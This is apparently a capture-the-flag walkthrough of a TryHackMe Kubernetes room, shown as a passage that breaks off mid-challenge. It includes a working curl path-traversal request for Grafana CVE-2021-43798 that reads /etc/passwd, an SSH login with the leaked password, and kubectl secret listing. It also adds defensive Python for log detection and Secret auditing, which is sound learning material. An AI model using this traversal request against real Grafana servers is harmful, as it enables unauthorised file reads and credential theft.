Hola, a friend of mine thought it’d be cool for me to check out this room on the THM platform since they know I’m really into Kubernetes and security. I thought it sounded like a fun idea, so I jumped right in!

Room link: https://tryhackme.com/jr/kubernetesforyouly


Okay, so I kicked things off by giving the IP address a scan, hoping to stumble upon something cool or significant. And you know what? My instincts were right on the money – I actually discovered two apps listening on ports 5000 and 3000!

    ┌──(kali㉿kali)-[~]
    └─$ nmap -F 10.10.55.59
    Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-16 11:07 EDT
    Nmap scan report for 10.10.55.59
    Host is up (0.16s latency).
    Not shown: 96 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    111/tcp  open  rpcbind
    3000/tcp open  ppp
    5000/tcp open  upnp

    Nmap done: 1 IP address (1 host up) scanned in 0.85 seconds
    

I excitedly launched my web browser and opened the target on port 5000. And guess what? I came across this super fun game called “Etch A Sketch”!

However, while looking around the site's sources, I spotted something interesting in the ‘main.css’ file: a commented-out @import pointing at a Pastebin link. Curiosity piqued, I followed the link and found a base32 encoded string waiting for me. Exciting stuff!

    @import url("https://fonts.googleapis.com/css2?family=Bowlby+One+SC&display=swap");
    /* @import url("https://pastebin.com/cPs69B0y"); */
    @import url("https://fonts.googleapis.com/css2?family=Vollkorn:wght@500&display=swap");
    

Decoding the string revealed the word vagrant, which gave us the user we were searching for. Curious about the other app running on port 3000, I decided to take a closer look. It turned out to be Grafana, a monitoring tool, running version 8.3. After some Googling, I stumbled upon CVE-2021-43798, a directory traversal (often written up as LFI) vulnerability that lets an unauthenticated request read arbitrary files through the plugin asset handler.

https://vk9-sec.com/grafana-8-3-0-directory-traversal-and-arbitrary-file-read-cve-2021-43798/

    ┌──(kali㉿kali)-[~]
    └─$ curl --path-as-is 10.10.126.15:3000/public/plugins/alertmanager/../../../../../../../../etc/passwd
    root:x:0:0:root:/root:/bin/ash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/mail:/sbin/nologin
    news:x:9:13:news:/usr/lib/news:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    man:x:13:15:man:/usr/man:/sbin/nologin
    postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
    cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
    ftp:x:21:21::/var/lib/ftp:/sbin/nologin
    sshd:x:22:22:sshd:/dev/null:/sbin/nologin
    at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
    squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
    xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
    games:x:35:35:games:/usr/games:/sbin/nologin
    cyrus:x:85:12::/usr/cyrus:/sbin/nologin
    vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
    ntp:x:123:123:NTP:/var/empty:/sbin/nologin
    smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
    guest:x:405:100:guest:/dev/null:/sbin/nologin
    nobody:x:65534:65534:nobody:/:/sbin/nologin
    grafana:x:472:0:hereiamatctf907:/home/grafana:/sbin/nologin
    

And voilà! We struck gold: the comment (GECOS) field of the grafana entry holds the password. Let's SSH in now!

    ┌──(kali㉿kali)-[~]
    └─$ sshpass -p hereiamatctf907 ssh -o StrictHostKeyChecking=no vagrant@10.10.126.15
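
Since the whole foothold here rests on that one traversal request, here's a defender-side add-on of my own (not part of the room or of this writeup) showing what it looks like from the other end: a small Python check that scans access-log lines for plugin-asset requests that climb out of their plugin directory. The log lines are constructed, and the function names are mine.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the room or from a real Grafana
# instance). One benign plugin asset, one plain traversal, one URL-encoded one,
# and one unrelated API call.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Aug/2023:11:10:01 +0000] "GET /public/plugins/alertmanager/img/logo.svg HTTP/1.1" 200
10.0.0.9 - - [16/Aug/2023:11:10:07 +0000] "GET /public/plugins/alertmanager/../../../../../../../../etc/passwd HTTP/1.1" 200
10.0.0.9 - - [16/Aug/2023:11:10:09 +0000] "GET /public/plugins/alertmanager/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200
10.0.0.2 - - [16/Aug/2023:11:10:12 +0000] "GET /api/health HTTP/1.1" 200
"""

PLUGIN_PREFIX = "/public/plugins/"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def escapes_plugin_dir(raw_path: str) -> bool:
    """True when a plugin-asset request resolves outside its own plugin directory.

    The raw request path is percent-decoded (so %2e%2e counts as ..) and then
    normalised the way a naive file handler would join it onto the plugin
    directory. Anything that ends up above /public/plugins/<name>/ is flagged.
    """
    path = unquote(raw_path.split("?", 1)[0])
    if not path.startswith(PLUGIN_PREFIX):
        return False
    plugin, _, asset = path[len(PLUGIN_PREFIX):].partition("/")
    if not plugin or not asset:
        return False
    plugin_dir = posixpath.join(PLUGIN_PREFIX, plugin)
    resolved = posixpath.normpath(posixpath.join(plugin_dir, asset))
    return not resolved.startswith(plugin_dir + "/")


def find_traversal_requests(log_text: str) -> list[str]:
    """Return the raw request paths in log_text that escape a plugin directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if m and escapes_plugin_dir(m.group("path")):
            hits.append(m.group("path"))
    return hits


if __name__ == "__main__":
    for p in find_traversal_requests(SAMPLE_LOG):
        print("traversal:", p)
```

Two things the check gets right that a plain `grep '\.\./'` would miss: it percent-decodes before normalising, and it judges the resolved path rather than the literal one. That also explains the `--path-as-is` flag in the curl above: without it curl collapses the dot segments client-side and the server never sees them, so a detector has to work from the raw request line, not from a path something has already cleaned. The actual fix is the same normalise-then-check step on the server side, plus upgrading past the affected 8.x builds.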
    

Your Secret Crush

Here’s a little nudge in the right direction: “If you want to keep a secret, you must also hide it from yourself.” It’s like a secret within a secret, right? And hey, remember how Kubernetes lets you stash away secrets? That’s a pretty big hint! Now, hop into root mode and give this command a go to see a list of secrets. 🕵️‍♂️

    vagrant@johnny:~$ sudo ps aux | grep root
    vagrant@johnny:~$ k0s kubectl get secret
    

If that greets you with:

    The connection to the server 10.0.2.15:6443 was refused - did you specify the right host or port?

you can fix it by running the following commands:

    sudo -i
    swapoff -a
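
To show why the hint points at Kubernetes Secrets, here's an added example of my own (not from the room or from k0s) that takes the JSON form of `kubectl get secret ... -o json` and peels off the only layer protecting the values. The manifests are constructed and the names and values are placeholders.

```python
import base64
import json

# Constructed Secret manifest, shaped like `kubectl get secret <name> -o json`.
# Names and values are placeholders, not data from the room's cluster.
SAMPLE_SECRET_JSON = json.dumps({
    "apiVersion": "v1",
    "kind": "Secret",
    "metadata": {"name": "example-creds", "namespace": "default"},
    "type": "Opaque",
    "data": {
        "username": base64.b64encode(b"example-user").decode(),
        "password": base64.b64encode(b"placeholder-password").decode(),
    },
})

# Constructed SecretList, shaped like `kubectl get secret -o json` for a namespace.
SAMPLE_SECRET_LIST_JSON = json.dumps({
    "apiVersion": "v1",
    "kind": "SecretList",
    "items": [
        json.loads(SAMPLE_SECRET_JSON),
        {
            "apiVersion": "v1",
            "kind": "Secret",
            "metadata": {"name": "example-token", "namespace": "default"},
            "type": "kubernetes.io/service-account-token",
            "data": {"token": base64.b64encode(b"placeholder-jwt").decode()},
            "stringData": {"note": "stringData is written as plaintext"},
        },
    ],
})


def _items(manifest_json: str) -> list[dict]:
    """Accept either a single Secret or a SecretList and return the Secret objects."""
    manifest = json.loads(manifest_json)
    items = manifest["items"] if manifest.get("kind") == "SecretList" else [manifest]
    for item in items:
        if item.get("kind") != "Secret":
            raise ValueError(f"expected Secret, got {item.get('kind')!r}")
    return items


def decode_secrets(manifest_json: str) -> dict[str, dict[str, str]]:
    """Map secret name -> plaintext fields.

    Only a base64 layer is removed. That is the point of the hint: the API
    server returns these values to anyone allowed to get/list secrets, and on
    a k0s controller node root can do that through the admin kubeconfig that
    `k0s kubectl` uses.
    """
    decoded: dict[str, dict[str, str]] = {}
    for item in _items(manifest_json):
        fields = {
            key: base64.b64decode(value).decode("utf-8", errors="replace")
            for key, value in item.get("data", {}).items()
        }
        # stringData is a write-only convenience the server folds into data;
        # it only survives in manifests on disk, so include it verbatim.
        fields.update(item.get("stringData", {}))
        decoded[item["metadata"]["name"]] = fields
    return decoded


def service_account_tokens(manifest_json: str) -> list[str]:
    """Names of secrets holding long-lived ServiceAccount tokens.

    Each one is a bearer credential for the API server, so they deserve a
    second look in any audit of who can read secrets.
    """
    return [i["metadata"]["name"] for i in _items(manifest_json)
            if i.get("type") == "kubernetes.io/service-account-token"]


if __name__ == "__main__":
    for name, fields in decode_secrets(SAMPLE_SECRET_LIST_JSON).items():
        print(name, sorted(fields))  # keys only; values stay off the terminal
```

The defender's takeaways are the mirror image of the hint: base64 is encoding, not encryption, so the controls that matter are RBAC on `get`/`list` for secrets, encryption at rest for etcd, and keeping node root (and the k0s admin kubeconfig) out of reach of a web app's service account.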
    

[to be continued..]